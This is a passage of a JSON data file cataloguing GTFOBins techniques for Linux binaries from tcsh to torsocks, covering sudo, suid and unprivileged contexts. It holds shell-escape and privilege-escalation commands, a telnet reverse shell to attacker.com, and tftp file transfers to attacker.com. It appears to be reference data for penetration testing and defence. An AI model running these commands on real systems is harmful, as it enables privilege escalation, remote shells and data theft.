installation","aliases":[]},{"id":"gtfo:tcsh:shell:0:suid","toolId":"gtfo:tcsh","toolName":"tcsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tcsh -b","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tcsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tcsh:shell:0:unprivileged","toolId":"gtfo:tcsh","toolName":"tcsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tcsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tdbtool:shell:0:sudo","toolId":"gtfo:tdbtool","toolName":"tdbtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tdbtool\n! /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tdbtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tdbtool:shell:0:suid","toolId":"gtfo:tdbtool","toolName":"tdbtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tdbtool\n! /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tdbtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tdbtool:shell:0:unprivileged","toolId":"gtfo:tdbtool","toolName":"tdbtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tdbtool\n! /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tdbtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tee:file-write:0:sudo","toolId":"gtfo:tee","toolName":"tee","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | tee /path/to/output-file","description":"Use `-a` to append data to exising files.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tee/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tee:file-write:0:suid","toolId":"gtfo:tee","toolName":"tee","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | tee /path/to/output-file","description":"Use `-a` to append data to exising files.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tee/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tee:file-write:0:unprivileged","toolId":"gtfo:tee","toolName":"tee","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | tee /path/to/output-file","description":"Use `-a` to append data to exising files.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tee/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:telnet:reverse-shell:0:sudo","toolId":"gtfo:telnet","toolName":"telnet","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\ntelnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/telnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:telnet:reverse-shell:0:suid","toolId":"gtfo:telnet","toolName":"telnet","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\ntelnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/telnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:telnet:reverse-shell:0:unprivileged","toolId":"gtfo:telnet","toolName":"telnet","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\ntelnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/telnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:telnet:shell:0:sudo","toolId":"gtfo:telnet","toolName":"telnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"telnet\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/telnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:telnet:shell:0:suid","toolId":"gtfo:telnet","toolName":"telnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"telnet\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/telnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:telnet:shell:0:unprivileged","toolId":"gtfo:telnet","toolName":"telnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"telnet\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/telnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:terraform:file-read:0:sudo","toolId":"gtfo:terraform","toolName":"terraform","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"terraform console\nfile(\"/path/to/input-file\")","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/terraform/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:terraform:file-read:0:suid","toolId":"gtfo:terraform","toolName":"terraform","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"terraform console\nfile(\"/path/to/input-file\")","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/terraform/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:terraform:file-read:0:unprivileged","toolId":"gtfo:terraform","toolName":"terraform","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"terraform console\nfile(\"/path/to/input-file\")","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/terraform/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tex:shell:0:sudo","toolId":"gtfo:tex","toolName":"tex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xetex"]},{"id":"gtfo:tex:shell:0:suid","toolId":"gtfo:tex","toolName":"tex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xetex"]},{"id":"gtfo:tex:shell:0:unprivileged","toolId":"gtfo:tex","toolName":"tex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xetex"]},{"id":"gtfo:tftp:download:0:sudo","toolId":"gtfo:tftp","toolName":"tftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tftp attacker.com\nget /path/to/input-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tftp:download:0:suid","toolId":"gtfo:tftp","toolName":"tftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tftp attacker.com\nget /path/to/input-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tftp:download:0:unprivileged","toolId":"gtfo:tftp","toolName":"tftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"tftp attacker.com\nget /path/to/input-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tftp:upload:0:sudo","toolId":"gtfo:tftp","toolName":"tftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tftp attacker.com\nput /path/to/input-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tftp:upload:0:suid","toolId":"gtfo:tftp","toolName":"tftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tftp attacker.com\nput /path/to/input-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tftp:upload:0:unprivileged","toolId":"gtfo:tftp","toolName":"tftp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"tftp attacker.com\nput /path/to/input-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tic:file-read:0:sudo","toolId":"gtfo:tic","toolName":"tic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tic -C /path/to/input-file","description":"This translates a terminfo file from source format into compiled format. It will attempt to translate an arbitrary file and output the contents of the file on failure.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tic:file-read:0:suid","toolId":"gtfo:tic","toolName":"tic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tic -C /path/to/input-file","description":"This translates a terminfo file from source format into compiled format. It will attempt to translate an arbitrary file and output the contents of the file on failure.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tic:file-read:0:unprivileged","toolId":"gtfo:tic","toolName":"tic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tic -C /path/to/input-file","description":"This translates a terminfo file from source format into compiled format. It will attempt to translate an arbitrary file and output the contents of the file on failure.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:time:shell:0:sudo","toolId":"gtfo:time","toolName":"time","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"time /bin/sh","description":"Note that the shell might have its own builtin `time` implementation, which may behave differently than the binary, which is often located at `/usr/bin/time`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/time/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:time:shell:0:suid","toolId":"gtfo:time","toolName":"time","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"time /bin/sh -p","description":"Note that the shell might have its own builtin `time` implementation, which may behave differently than the binary, which is often located at `/usr/bin/time`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/time/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:time:shell:0:unprivileged","toolId":"gtfo:time","toolName":"time","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"time /bin/sh","description":"Note that the shell might have its own builtin `time` implementation, which may behave differently than the binary, which is often located at `/usr/bin/time`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/time/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:timedatectl:inherit:0:sudo","toolId":"gtfo:timedatectl","toolName":"timedatectl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"timedatectl list-timezones","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/timedatectl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:timedatectl:inherit:0:unprivileged","toolId":"gtfo:timedatectl","toolName":"timedatectl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"timedatectl list-timezones","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/timedatectl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:timeout:shell:0:sudo","toolId":"gtfo:timeout","toolName":"timeout","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"timeout 0 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/timeout/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:timeout:shell:0:suid","toolId":"gtfo:timeout","toolName":"timeout","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"timeout 0 /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/timeout/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:timeout:shell:0:unprivileged","toolId":"gtfo:timeout","toolName":"timeout","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"timeout 0 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/timeout/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmate:shell:0:sudo","toolId":"gtfo:tmate","toolName":"tmate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmate -c /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmate:shell:0:suid","toolId":"gtfo:tmate","toolName":"tmate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmate -c /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmate:shell:0:unprivileged","toolId":"gtfo:tmate","toolName":"tmate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tmate -c /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:file-read:0:sudo","toolId":"gtfo:tmux","toolName":"tmux","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tmux -f /path/to/input-file","description":"The file is read and parsed as a `tmux` configuration file, part of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:file-read:0:suid","toolId":"gtfo:tmux","toolName":"tmux","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tmux -f /path/to/input-file","description":"The file is read and parsed as a `tmux` configuration file, part of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:file-read:0:unprivileged","toolId":"gtfo:tmux","toolName":"tmux","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tmux -f /path/to/input-file","description":"The file is read and parsed as a `tmux` configuration file, part of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:shell:0:sudo","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -c /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:shell:0:suid","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -c /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:shell:0:unprivileged","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tmux -c /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:shell:1:sudo","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -S /path/to/socket","description":"Provided to have enough permissions to access the socket (e.g., `/tmp/tmux-xxx/default`).","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:shell:1:suid","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -S /path/to/socket","description":"Provided to have enough permissions to access the socket (e.g., `/tmp/tmux-xxx/default`).","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tmux:shell:1:unprivileged","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tmux -S /path/to/socket","description":"Provided to have enough permissions to access the socket (e.g., `/tmp/tmux-xxx/default`).","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmux/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:top:shell:0:sudo","toolId":"gtfo:top","toolName":"top","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>~/.config/procps/toprc\ntop\n# press return twice\nreset","description":"The config path might be different.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/top/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:top:shell:0:unprivileged","toolId":"gtfo:top","toolName":"top","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>~/.config/procps/toprc\ntop\n# press return twice\nreset","description":"The config path might be different.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/top/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:torify:shell:0:sudo","toolId":"gtfo:torify","toolName":"torify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"torify /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/torify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:torify:shell:0:unprivileged","toolId":"gtfo:torify","toolName":"torify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"torify /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/torify/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:torsocks:shell:0:sudo","toolId":"gtfo:torsocks","toolName":"torsocks","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"torsocks /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/torsocks/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:torsocks:shell:0:unprivileged","toolId":"gtfo:torsocks","toolName":"torsocks","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"torsocks 